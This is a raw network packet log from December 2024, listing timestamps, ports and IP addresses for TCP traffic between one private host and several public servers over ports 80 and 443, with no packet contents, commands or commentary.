Dec 12, 2024 16:48:31.513365984 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.513382912 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.513401031 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.514688015 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.514734030 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.514806032 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.514849901 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.516083002 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.516109943 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.516124010 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.516146898 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.517522097 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.517569065 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.517749071 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.517846107 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.519149065 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.519217014 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.519284010 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.519326925 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.520690918 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.520750999 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.520909071 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.521217108 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.522090912 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.522134066 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.522135973 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.522178888 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.523186922 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.523233891 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.523267984 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.523308039 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.524435043 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.524492979 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.524523020 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.524560928 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.525738001 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.525801897 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.525867939 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.525909901 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.527168036 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.527219057 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.527267933 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.527374029 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.528516054 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.528578997 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.528647900 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.528778076 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.529911041 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.529961109 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.530019999 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.530162096 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.531302929 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.531356096 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.531368017 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.531409979 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.532752991 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.532795906 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.532830954 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.532886028 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.534214973 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.534277916 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.534306049 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.534346104 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.535537958 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.535552025 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.535587072 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.535603046 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.536849022 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.536899090 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.536941051 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.536973953 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.538259983 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.538348913 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.538352966 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.538395882 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.539644003 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.539705038 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.539772987 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.540167093 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.540993929 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.541076899 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.541184902 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.541224957 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.542422056 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.542512894 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.542562962 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.543781996 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.543828011 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.543906927 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.543941021 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.545173883 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.545283079 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.545319080 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.545367002 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.546644926 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.546709061 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.546749115 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.546789885 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.548017979 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.548038960 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.548065901 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.548089981 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.549334049 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.549562931 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.549616098 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.550776005 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.550828934 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.550843954 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.550884962 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.552136898 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.552275896 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.552324057 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.553546906 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.553611994 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.553679943 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.553715944 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.554857016 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.554910898 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.554953098 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.554989100 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.556257010 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.556318998 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.556365013 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.556401968 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.557638884 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.557660103 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:31.557689905 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.557706118 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:31.886363983 CET	443	49917	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:31.886423111 CET	49917	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:31.886442900 CET	443	49917	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:31.886454105 CET	443	49917	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:31.886492014 CET	49917	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:31.887816906 CET	49917	443	192.168.2.10	34.117.59.81
Dec 12, 2024 16:48:31.887835979 CET	443	49917	34.117.59.81	192.168.2.10
Dec 12, 2024 16:48:31.908476114 CET	49920	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:31.908520937 CET	443	49920	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:31.908591986 CET	49920	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:31.908963919 CET	49920	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:31.908974886 CET	443	49920	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:31.987271070 CET	443	49916	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:31.987335920 CET	49916	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:31.987364054 CET	443	49916	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:31.987380981 CET	443	49916	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:31.987422943 CET	49916	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:31.988799095 CET	49916	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:31.988814116 CET	443	49916	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:33.292985916 CET	443	49920	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:33.293045998 CET	49920	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:33.296700001 CET	49920	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:33.296713114 CET	443	49920	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:33.297049046 CET	443	49920	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:33.297157049 CET	49920	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:33.298384905 CET	49920	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:33.343326092 CET	443	49920	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:33.744801998 CET	49904	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:33.745026112 CET	49926	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:33.864952087 CET	80	49926	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:33.865051031 CET	49926	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:33.865273952 CET	49926	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:33.865468979 CET	80	49904	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:33.865657091 CET	49904	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:33.985090971 CET	80	49926	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:33.991977930 CET	443	49920	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:33.992038965 CET	49920	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:33.992063999 CET	443	49920	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:33.992079973 CET	443	49920	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:33.992105007 CET	49920	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:33.992122889 CET	49920	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:33.992697954 CET	49920	443	192.168.2.10	149.154.167.220
Dec 12, 2024 16:48:33.992712021 CET	443	49920	149.154.167.220	192.168.2.10
Dec 12, 2024 16:48:35.207360029 CET	80	49926	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:35.207516909 CET	49926	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:35.224476099 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:35.228140116 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:35.344525099 CET	80	49912	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:35.345750093 CET	49912	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:35.347922087 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:35.348186970 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:35.348370075 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:35.468296051 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:35.736335039 CET	49933	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:35.856218100 CET	80	49933	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:35.856416941 CET	49933	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:35.856524944 CET	49933	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:35.976238012 CET	80	49933	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:36.675435066 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.675463915 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.675471067 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.675554991 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.675595045 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.675601959 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.675611973 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.675617933 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.675651073 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.675818920 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.675825119 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.675837994 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.675872087 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.796211004 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.796226978 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.796268940 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.800365925 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.800416946 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.868206024 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.868268967 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.868282080 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.868498087 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.872369051 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.872437954 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.873872995 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.873930931 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.873966932 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.874010086 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.882806063 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.882831097 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.882862091 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.882879972 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.890696049 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.890759945 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.890949965 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.891057014 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.899056911 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.899122000 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.899127960 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.899178028 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.907546043 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.907605886 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.907659054 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.907718897 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.915924072 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.916047096 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.916059017 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.916270971 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.924375057 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.924386024 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.924432993 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.932679892 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.932763100 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.932909966 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.932950974 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.941119909 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.941165924 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.941234112 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.941397905 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.949577093 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.949598074 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.949625015 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.949646950 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.988672018 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.988727093 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:36.988806009 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:36.988867044 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.060383081 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.060436010 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.060439110 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.060472965 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.061676979 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.061784983 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.061824083 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.066581964 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.066628933 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.066670895 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.070199013 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.070260048 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.070353985 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.070393085 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.075161934 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.075205088 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.075431108 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.075479031 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.079854965 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.079906940 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.079955101 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.079998970 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.084373951 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.084414005 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.084496975 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.084553957 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.088980913 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.089108944 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.089127064 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.089397907 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.093518972 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.093596935 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.093646049 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.093767881 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.098154068 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.098202944 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.098212004 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.098238945 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.102551937 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.102593899 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.102643967 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.102684975 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.107609034 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.107656956 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.107836008 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.107877016 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.111799002 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.111893892 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.111968994 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.116369009 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.116410017 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.116444111 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.116694927 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.120904922 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.120950937 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.121009111 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.121048927 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.124399900 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.124445915 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.124525070 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.124561071 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.127959013 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.128005028 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.128215075 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.128283978 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.132884026 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.132953882 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.132988930 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.133038044 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.135080099 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.135130882 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.135329008 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.135366917 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.138539076 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.138601065 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.138669014 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.138720036 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.141985893 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.142035007 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.142071009 CET	80	49931	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:37.142116070 CET	49931	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:37.185195923 CET	80	49933	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:37.185300112 CET	80	49933	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:37.185344934 CET	49933	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:37.187593937 CET	49933	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:37.187948942 CET	49938	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:37.252753973 CET	80	49931	31.41.244.11	192.168.2.10
